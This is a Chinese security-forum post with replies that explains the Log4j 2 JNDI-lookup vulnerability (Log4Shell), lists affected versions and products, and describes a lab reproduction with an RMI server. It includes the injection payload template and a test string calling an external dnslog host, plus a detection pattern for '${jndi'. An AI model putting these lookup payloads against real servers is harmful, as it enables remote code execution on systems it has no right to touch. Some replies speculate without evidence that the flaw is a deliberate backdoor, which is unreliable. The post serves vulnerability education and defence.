首页
社区
课程
招聘
[原创]log4j 2漏洞原理及复现
发表于: 2021-12-14 13:04 7078

[原创]log4j 2漏洞原理及复现

2021-12-14 13:04
7078

被log4j2漏洞刷屏了,公司也是紧急修复了一波,现在来整个盘一下这个漏洞到底是什么原理!测试漏洞的人太多,连dnslog很长一段时间都访问不了,最后还用的ceye测试复现的。

影响版本
CVE-2021-44228:
Apache Log4j 2存在远程代码执行漏洞,攻击者可以通过构造恶意数据植入进日志记录中时即可导致任意代码执行。官方针对该漏洞发布了log4j-2.15.0-rc2版本进行修复。

CVE-2021-45046:
Apache Log4j 2 在线程上下文消息模式和上下文查找模式容易受到拒绝服务攻击,攻击者可构造恶意请求触发该缺陷,从而引发业务中断。

CVE-2021-4104:
Apache Log4j 1.x版本在特定配置时存在JMSAppender反序列化代码执行漏洞,当攻击者具有修改 Log4j 配置的权限时,JMSAppender容易受到不可信数据的反序列化,攻击者可以使用特定配置利用JMSAppender执行JNDI请求,从而造成远程代码执行。

影响范围
Spring-Boot-strater-log4j2Apache
Struts2Apache
SolrApache
FlinkApache
DruidElasticSearch
Flume
Dubbo
Redis
Logstash
Kafka
vmvare

个人链接:log4j 2 漏洞原理及复现 | Hackt0's Blog

最主要的漏洞成因就是下面这张图了,log4j2提供的lookup功能

日志中包含 ${},lookup功能就会将表达式的内容替换为表达式解析后的内容,而不是表达式本身。log4j 2将基本的解析都做了实现:

比如常见的用户登陆日志记录

常见解析

而其中的JNDI(Java Naming and Directory Interface)就是本次的主题了,就是提供一个目录系统,并将服务与对象关联起来,可以使用名称来访问对象。而log4j 2中JNDI解析未作限制,可以直接访问到远程对象,如果是自己的服务器还好说,那如果访问到黑客的服务器呢?

也就是当记录日志的一部分是用户可控时,就可以构造恶意字符串使服务器记录日志时调用JNDI访问恶意对象,也就是流传出的payload构成:

${jndi:ldap:xxx.xxx.xxx.xxx:xxxx/exp}

我们可以将上面日志记录的代码简单修改一下,假设用户名是从外部获取的用户输入,此时构建一个恶意用户名${jndi:ladp://z2xcu7.dnslog.cn/exp},然后触发日志记录(可以借助DNSLog生成临时域名用于查看测试是否生效)

可以看到,记录日志时发起了JNDI解析,访问了DNS提供的域名并生成记录

其实JNDI通过SPI(Service Provider Interface)封装了多个协议,包括LDAP、RMI、DNS、NIS、NDS、RMI、CORBA;

复现选择了使用RMI服务,搭建较为快速

攻击思路(文章中使用的jdk1.8):

我们还是选择之前的模拟日志记录,假设站点会记录用户登陆日志,实际上大部分网站确实会做相关功能

RMI服务端搭建,监听本地8888(自定义)端口,用Reference类引用恶意对象

恶意对象模拟执行cmd打开计算器,并且输出一个语句用于标记执行处

执行RMIServer,创建RMI服务

构建恶意用户名模拟输入,执行触发恶意解析

恶意代码被执行,注意看恶意代码执行记录,是在日志记录的地方被执行

看看大佬们都干了啥

特斯拉测试

可以通过${jndi字串匹配是否受到攻击

修复参考链接:

https://mp.weixin.qq.com/s/53B67AiZmNP7LbjFx5QCyg

目前已证实服务器易受到漏洞攻击的公司包括苹果、亚马逊、特斯拉、谷歌、百度、腾讯、网易、京东、Twitter、 Steam等。据统计,共有6921个应用程序都有被攻击的风险,其中《我的世界》首轮即被波及。就连修改iPhone手机名称都能触发,最主要的是这是国外黑客玩了几个月玩腻了才公开的漏洞!

一个范围广的0day漏洞可能导致整个互联网沦为肉鸡或者瘫痪,网络安全,任重而道远。

不过早在11月24日,阿里云就监测到了在野攻击并给apache报告了,只是apache新出的版本只是拦截了ldap,其他协议依旧有效。所以公开后很快被腾讯团队测试可绕过,当天发出修复版本Log4j 2.15.0-rc2

最新安全版本:log4j-2.16.0、log4j-2.12.2

 
 
 
 
 
 
 
 
 
 
${ctx:loginId}
${map:type}
${filename}
${date:MM-dd-yyyy}
${docker:containerId}${docker:containerName}
${docker:imageName}
${env:USER}
${event:Marker}
${mdc:UserId}
${java}
${jndi:logging/context-name}
${hostName}
${docker:containerId}
${k8s}
${log4j}
${main}
${name}
${marker}
${spring}
${sys:logPath}
${web:rootDir}
${ctx:loginId}
${map:type}
${filename}
${date:MM-dd-yyyy}
${docker:containerId}${docker:containerName}
${docker:imageName}
${env:USER}
${event:Marker}
${mdc:UserId}
${java}
${jndi:logging/context-name}
${hostName}
${docker:containerId}
${k8s}
${log4j}
${main}
${name}
${marker}
${spring}
${sys:logPath}

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

最后于 2021-12-17 14:03 被hacktu编辑 ,原因: 补充漏洞新情况
收藏
免费 3
支持
分享
最新回复 (12)
雪    币: 6977
活跃值: (1786)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
2
图挂了
2021-12-14 13:50
0
雪    币: 746
活跃值: (1514)
能力值: ( LV4,RANK:54 )
在线值:
发帖
回帖
粉丝
3
上传了,好像看雪不支持图床
2021-12-14 14:04
0
雪    币: 47147
活跃值: (20445)
能力值: (RANK:350 )
在线值:
发帖
回帖
粉丝
4
hacktu 上传了,好像看雪不支持图床
支持部分图床,论坛有脚本,会定期将图床图片本地化,方便永久保存。但有些图床,爬不过来,有所防。
2021-12-14 17:04
0
雪    币: 0
活跃值: (21)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
给看雪的老铁,推荐下这个 Log4j2 漏洞原理解析、复盘:https://mp.weixin.qq.com/s/wHUv-lFXBUcPp0uIjvHSaw
2021-12-14 18:37
0
雪    币: 1200
活跃值: (1133)
能力值: ( LV10,RANK:170 )
在线值:
发帖
回帖
粉丝
6
在jdk1.8.0_311下调试,始终无法加载运行server.Log4jRCE,是否需要额外的配置?
2021-12-20 20:43
0
雪    币: 746
活跃值: (1514)
能力值: ( LV4,RANK:54 )
在线值:
发帖
回帖
粉丝
7
不用运行这个,运行RMIServer即可
2021-12-21 16:41
0
雪    币: 1475
活跃值: (14652)
能力值: ( LV12,RANK:380 )
在线值:
发帖
回帖
粉丝
8
经过群里讨论,一致认为这玩意不是个漏洞,他就是个后门,人心险恶啊
2021-12-21 17:34
0
雪    币: 6124
活跃值: (4656)
能力值: ( LV6,RANK:80 )
在线值:
发帖
回帖
粉丝
9
SSH山水画 经过群里讨论,一致认为这玩意不是个漏洞,他就是个后门,人心险恶啊
确实比起漏洞来说,后门的可能性更大。只是被人把窗户纸捅破了。
2021-12-21 19:34
0
雪    币: 746
活跃值: (1514)
能力值: ( LV4,RANK:54 )
在线值:
发帖
回帖
粉丝
10
据说阿里早就发现在野利用,先报告给Apache了,为什么这次报告后修复这么长时间才出第一版就不为人知了,工信部反正很生气
2021-12-21 21:24
0
雪    币: 1392
活跃值: (5172)
能力值: ( LV13,RANK:240 )
在线值:
发帖
回帖
粉丝
11
hacktu 据说阿里早就发现在野利用,先报告给Apache了,为什么这次报告后修复这么长时间才出第一版就不为人知了,工信部反正很生气[em_84]
据说是召集过去 挨了一顿批评。
2021-12-21 22:51
0
雪    币: 627
活跃值: (1568)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
12
dolphindiv 在jdk1.8.0_311下调试,始终无法加载运行server.Log4jRCE,是否需要额外的配置?
jdk1.8.311属于高版本了,默认配置不能进行JNDI注入,需要tomcat bypass;jdk1.8的话181默认是可以的
2021-12-24 14:53
0
雪    币: 9
活跃值: (287)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
13
图挂了
2022-9-10 10:47
0
游客
登录 | 注册 方可回帖
返回
//